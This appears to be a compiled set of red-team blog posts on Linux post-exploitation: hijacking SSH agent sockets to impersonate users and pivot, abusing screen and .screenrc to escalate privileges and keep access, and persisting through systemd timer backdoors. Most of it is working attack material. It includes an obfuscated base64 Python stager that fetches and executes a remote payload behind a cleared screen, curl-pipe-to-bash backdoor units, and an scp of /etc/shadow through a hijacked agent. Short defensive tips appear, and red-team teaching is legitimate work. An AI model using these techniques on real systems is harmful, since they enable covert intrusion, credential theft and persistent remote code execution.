Leverage SSH Agents to Move Across the Network

Accessing a production system in a Linux environment these days often requires a fair amount of ssh tunneling to reach restricted systems. This is because it doesn’t make sense to expose SSH to the internet, or even to your general-use internal network. Instead there might be a bastion or jump box with ssh exposed as your initial way into the environment. Once connected to the bastion host, you can then connect to another system within that restricted network, or even repeat the process to reach more restricted hosts.

In order to handle authentication across multiple systems, users leverage ssh agents. An SSH agent is effectively a helper program which stores unencrypted identity keys and credentials in memory. This allows the SSH client to access those credentials via a Unix stream socket, so the end user doesn’t have to provide their credentials multiple times. The user can also request that the SSH client retain access to the socket when connecting to another system by enabling agent forwarding with the -A flag.
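
For context, a typical agent workflow looks something like this (the key path and host are placeholders):

eval "$(ssh-agent -s)"        # start an agent; exports SSH_AUTH_SOCK and SSH_AGENT_PID
ssh-add ~/.ssh/id_ed25519     # cache the decrypted private key in the agent
ssh -A user@bastion.example   # connect to the bastion with agent forwarding enabled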

With SSH agent forwarding enabled, the SSH client essentially creates a linked copy of the stream socket on the remote system. By default the socket is created in the /tmp directory in a folder named ssh-<10 random characters>, with the socket named agent.<agent pid>. The ssh agent folder is only accessible to the connecting user account. To see what agents are around on a given machine, you can look through the /tmp directory with a command similar to:

ls -l /tmp | egrep 'ssh-.{10}$'

Finding SSH Agents

Agent sockets are stored in /tmp, and the reference to which agent to use is controlled entirely by the value of the SSH_AUTH_SOCK environment variable. The root account, superusers, and possibly sudoers can therefore point that variable at the socket of another connected user and effectively masquerade as them on the network. In fact, you would even have access to any of the other keys the user added to the agent. Given access to a shared system’s root account, you could use commands like the following to impersonate a user and view a list of registered keys.

ls /tmp | egrep 'ssh-.{10}$' # list the agent sockets that may be available
export SSH_AUTH_SOCK=/tmp/ssh-<10 random characters>/agent.<pid> # choose one and set it as your SSH_AUTH_SOCK environment variable
ssh-add -l # list all credentials available to the agent

The commands can even be combined into a single loop like the one below. However, the ability to query and leverage the credentials depends on a stable connection from the target user. Stale agents can hang, because the socket cleanup process doesn’t necessarily happen once a session is closed.

for AGENT in $(ls /tmp | egrep 'ssh-.{10}$'); do export SSH_AUTH_SOCK=/tmp/$AGENT/$(ls /tmp/$AGENT); echo $AGENT $(stat -c '%U' /tmp/$AGENT); timeout 10 ssh-add -l; done

Note: A lot of common programs like git, rsync, scp, etc. also allow you to leverage SSH agents. So if a given agent doesn’t get you access to another system, also be sure to try using it to authenticate against common services.
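
For example, with a hijacked socket exported, the same agent can authenticate these tools (the socket path, host, and repo below are all hypothetical):

export SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXXX/agent.1234  # hypothetical hijacked socket
scp victim@10.0.0.50:/etc/shadow /tmp/               # pull files as the target user
git clone git@internal-git.example:ops/secrets.git   # clone repos their key can reach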

Impersonating users and pivoting

Once you have an agent you want to leverage, just set it as the SSH_AUTH_SOCK environment variable, then use it to try to log into other systems or services as the targeted user. It’s also worth mentioning that you may be able to combine the ssh agent with port forwarding to gain access to otherwise restricted systems. I covered leveraging port forwarding in a previous post.

Always run commands like w or who to see where the user is connecting from, then use that IP address to try to connect back to the user’s origin system. Most of the time, the user’s public key is in their own system’s authorized_keys file for ease of access.
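
A minimal version of that check and pivot (the user and IP are hypothetical):

w -h                  # list logged-in users and the hosts they connected from
ssh admin@10.0.0.23   # try connecting back to the user's origin system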

This issue is most often seen in development environments, where users traditionally have elevated system access. These systems are also not as well defended or updated as often as production systems. Couple that with the fact that users often don’t maintain account separation between development and production environments, and you have prime conditions for leveraging ssh agents.

Abusing screen and .screenrc to Escalate and Maintain Access

When it comes to playing the part of the hacker/red team in competitions like CCDC, I’m always looking for unique ways to gain and maintain access to systems. Lately I’ve been toying with the idea of leveraging features in common administration tools instead of exploits or misconfigurations. My favorite is abusing screen and .screenrc features to establish a foothold.

Why screen?

The screen command is something I think every Linux administrator uses every day. The reason is simple: it’s probably the best way to preserve your work or run longer jobs without the effort of creating a system service. When the screen command is issued, it effectively creates another terminal (TTY) independent of the current user’s session. So if the administrator’s session isn’t stable, or it’s impractical to wait, the job won’t be affected.

Fun Fact: By default screens are actually allocated a TTY and spawned by the init process, not the current user. So the screen process, TTY, and child processes won’t show up in user-level process listings or the standard last, w, or who command outputs. Instead you can use the who command with the -a (all) option to also display TTYs spawned by init.
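
For example, compare the two listings:

who      # standard output; screen TTYs spawned by init are missing
who -a   # all entries, including TTYs spawned by init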

Abusing screen and .screenrc via abandoned screens

The most common use case for the screen command is administrators running jobs that can’t be interrupted, so it’s always worth checking whether any screens are running when you compromise a user’s account. It’s not that uncommon for administrators to elevate privileges, or even switch users altogether, within a screen. If an administrator switches to the root/superuser account in a screen, the screen still only grants access to the original spawning user. If that’s a lower-privileged user that you’ve compromised, it’s an easy privilege escalation.
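
A quick sweep for abandoned screens might look like the following (the session name is illustrative, and the socket directory can vary by distribution):

screen -ls                     # list the current user's screen sessions
ls /var/run/screen/            # as root, list every user's screen socket directory
screen -r 12345.pts-0.devbox   # reattach to a detached session (example name)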

You might be thinking that the administrator should have just used sudo to elevate privileges within the screen instead of switching to root/superuser. That’s definitely safer, but not foolproof: once a user’s password is entered for a sudo command, by default it’s not requested again for 15 minutes. So if you’re in the right screen at the right time, or willing to wait long enough, sudo can still be used as a means of privilege escalation.

You can check whether the current user within a screen can sudo without a password prompt by running sudo in non-interactive mode and seeing if it errors out.

if sudo -n true 2>/dev/null; then echo "I can sudo"; else echo "I cannot sudo"; fi

Abusing screen and .screenrc via multi-user support

The alternative laid out by the developer of the screen tool is actually a rather detailed set of permissions and multi-user support for individual screens. Going over the individual permissions that are available is probably out of scope for this post. However, multi-user support is used in cases where multiple individuals need access to jobs running in a service account’s screen, but aren’t actually allowed superuser privileges.

For instance, in my consulting days we had external nmap scanning systems, and all the consultants had access to the scans running within screens in case they needed to be modified or stopped. This let us maintain access to all running jobs without needing superuser access to switch users or kill other users’ processes.

To use multi-user support, make sure the SUID bit is set on the screen executable and modify the individual user’s (~/.screenrc) or global (/etc/screenrc) screenrc file. For example, if you wanted to maintain access to screens created by root via a compromised standard user named tester, you could include the following in the /root/.screenrc file.

multiuser on
acladd tester
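
With those lines in place and screen setuid root, the compromised tester account can attach to root’s sessions using screen’s user/session syntax:

screen -ls root/   # list root's multiuser screen sessions
screen -x root/    # attach to root's screen as the tester user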

If screens are not being used often enough to leverage changes to the .screenrc file, you can also modify one of the target user’s profile files to issue the screen command automatically. You can do this by adding ‘screen -RR’ to the user’s ~/.bashrc file or the global /etc/bashrc file. This will reattach to any existing screen, or create a new screen and attach to it, once login has completed.
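
For example, against a hypothetical target whose home directory is /home/tester:

echo 'screen -RR' >> /home/tester/.bashrc   # auto-attach the user to a screen at login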

Note: For highly secure environments it’s likely best to disable multi-user support in the global screenrc file. Also consider setting timestamp_timeout=0 in your global sudoers configuration, which will require a password for every use of the sudo command. Change control and/or watchers on resource (~/.*rc) and profile files might also help.

Abusing screen and .screenrc with stuff and clear

Maintaining Access with the stuff and clear technique

Leveraging multi-user support isn’t the only way of abusing screen and .screenrc to maintain access. Instead, I now utilize a technique I call stuff and clear. In this technique, the target user’s .screenrc file is modified to create a named window whenever screen is executed. This arbitrary named window is then the target for the “stuff” command, which sends raw characters to the screen as if they were typed.

Luckily, the printf builtin will handle the raw character encoding. So printf can type out the shell payload, send a return key press, type out the clear command, and send a final return key press. The stuff command then effectively recreates the same screen-clearing effect that already happens when a new screen is created. So unless the user enters copy mode and scrolls up, or errors occur, they are unlikely to notice.
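
Stripped of the payload and encoding, the core of the technique can be sketched as a single append to the target’s .screenrc (the command writing /tmp/.proof is just a harmless placeholder):

printf 'screen -t "bash"\nstuff "id > /tmp/.proof\rclear\r"\n' >> ~/.screenrc   # printf embeds real carriage returns, so stuff "presses enter" after each command

On the user’s next screen launch, a window titled “bash” opens, runs the command, and clears itself.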

Here is a code segment from an Empyre module I wrote for CCDC a few years ago that does just as described. It writes an Empyre shell to the user’s .screenrc file using the stuff and clear technique.

echo 'screen -t "python"' >> ~/.screenrc && printf "stuff \""'echo \\'"\"import sys,base64;exec(base64.b64decode(\\\'bU9WakhVPSdSSVRQYURSbFFwJwppbXBvcnQgc3lzLCB1cmxsaWIyO289X19pbXBvcnRfXyh7MjondXJsbGliMicsMzondXJsbGliLnJlcXVlc3QnfVtzeXMudmVyc2lvbl9pbmZvWzBdXSxmcm9tbGlzdD1bJ2J1aWxkX29wZW5lciddKS5idWlsZF9vcGVuZXIoKTtVQT0nSDNTRTIwUVlSRlZGWTFVOCc7by5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLFVBKV07YT1vLm9wZW4oJ2h0dHA6Ly8xMC4wLjAuMTAwOjgwODAvaW5kZXguYXNwJykucmVhZCgpO2tleT0nM2ViMDMwYzZhYjA5OWIwYTM1NTcxMmZlMzhkNTlmZmInO1MsaixvdXQ9cmFuZ2UoMjU2KSwwLFtdCmZvciBpIGluIHJhbmdlKDI1Nik6CiAgICBqPShqK1NbaV0rb3JkKGtleVtpJWxlbihrZXkpXSkpJTI1NgogICAgU1tpXSxTW2pdPVNbal0sU1tpXQppPWo9MApmb3IgY2hhciBpbiBhOgogICAgaT0oaSsxKSUyNTYKICAgIGo9KGorU1tpXSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCiAgICBvdXQuYXBwZW5kKGNocihvcmQoY2hhcileU1soU1tpXStTW2pdKSUyNTZdKSkKZXhlYygnJy5qb2luKG91dCkp\\\'));"'\\'"\" | python &\rclear\r"'"' >> ~/.screenrc

Fun Fact: Screen also supports not terminating windows when a screen is exited. This can be done by adding the ‘zombie kr’ line to the .screenrc file. In the case of some payload types, this means the shell process would still be running until an administrator killed the screen manually.
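
Enabling that behavior takes one line in the same .screenrc:

echo 'zombie kr' >> ~/.screenrc   # dead windows linger; press k to kill or r to resurrect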

One Final Thought

Since I’m the current maintainer of linuxprivchecker, I’ve also begun making changes to help detect these opportunities related to abusing screen and .screenrc for privilege escalation. I hope to continue adding features to the tool and providing related blog posts like this one. These new features will likely sit in the unstable branch for some time before they make it to master. Any assistance with testing, feedback, or ideas is always welcome.

Establishing Persistence with systemd.timers

With the push to convert all of our old init-style process managers to the new cutting-edge systemd comes a whole new set of security concerns. In several recent competitions, I was able to establish persistence with systemd.timer units. Timer units are designed to run repetitive tasks on behalf of an existing service. This is normally used to establish service watchers, in case a service were to hang or crash. However, we can take advantage of this built-in core functionality to establish persistence at the init-system level with systemd.timers. As an added bonus, it’s a bit more difficult to find than a crontab, and there are several tools that can convert existing crontabs to systemd.timers.

In order to take advantage of persistence with systemd.timers, we just need write access to the /etc/systemd/system/ or /usr/lib/systemd/system/ directory. As a user with write access, normally only root, we can create a service unit file and a timer unit file. Once the files are created, we can register the timer unit with systemd and it will execute our service unit per the timer unit’s schedule. Timer units can even be registered with systemd to start at boot automatically, to maintain persistence through reboots.
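
A quick way to confirm whether the current account can actually plant unit files:

test -w /etc/systemd/system && echo '/etc/systemd/system is writable'
test -w /usr/lib/systemd/system && echo '/usr/lib/systemd/system is writable'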

Example persistence with systemd.timers

To establish persistence with systemd.timers, we first need to create a service unit. In this case I created a file called /etc/systemd/system/backdoor.service, which connects to a web server and executes the given command. Note that ExecStart does not perform shell interpretation, so the pipe has to be wrapped in an explicit shell invocation.

[Unit]
Description=Backdoor

[Service]
Type=simple
ExecStart=/bin/bash -c 'curl --insecure https://127.0.0.1/cmd.txt | bash'

Next I created a timer unit that launches my backdoor.service every 3 minutes to execute my latest CnC commands. The following is the contents of the file /etc/systemd/system/backdoor.timer, which I used throughout the CCDC competitions.

[Unit]
Description=Runs backdoor every 3 mins

[Timer]
OnBootSec=5min
OnUnitActiveSec=3min
Unit=backdoor.service

[Install]
WantedBy=multi-user.target

Once those two files are created within one of the systemd unit directories, we can simply establish the persistence by reloading systemd’s unit files (systemctl daemon-reload) and starting the timer unit.

systemctl start backdoor.timer

Then, to ensure the timer is automatically started at boot, tell systemd to enable the timer unit at startup.

systemctl enable backdoor.timer

As far as I can tell from my research, there isn’t any easy way to detect these types of backdoors. However, in the CCDC competition space, I highly recommend running a command like the following in a screen to identify changes to timer units.

watch -d systemctl list-timers

Example persistence with a Single Service Unit

The alternative is to have a single service unit that exits cleanly (exit code 0) and continuously restarts itself. Below is an example of such a service unit file, which will restart every 3 minutes and execute our CnC command (the [Install] section allows it to be enabled at boot).

[Service]
Type=simple
ExecStart=/bin/bash -c 'curl --insecure https://127.0.0.1/cmd.txt | bash; exit 0'
Restart=always
RestartSec=180

[Install]
WantedBy=multi-user.target
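
Assuming the unit is saved as /etc/systemd/system/backdoor.service, matching the earlier example, it can be registered the same way:

systemctl daemon-reload                   # pick up the new unit file
systemctl enable --now backdoor.service   # start it now and persist across reboots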

For more detailed information see the full documentation at: https://www.freedesktop.org/software/systemd/man/ or through your local man pages.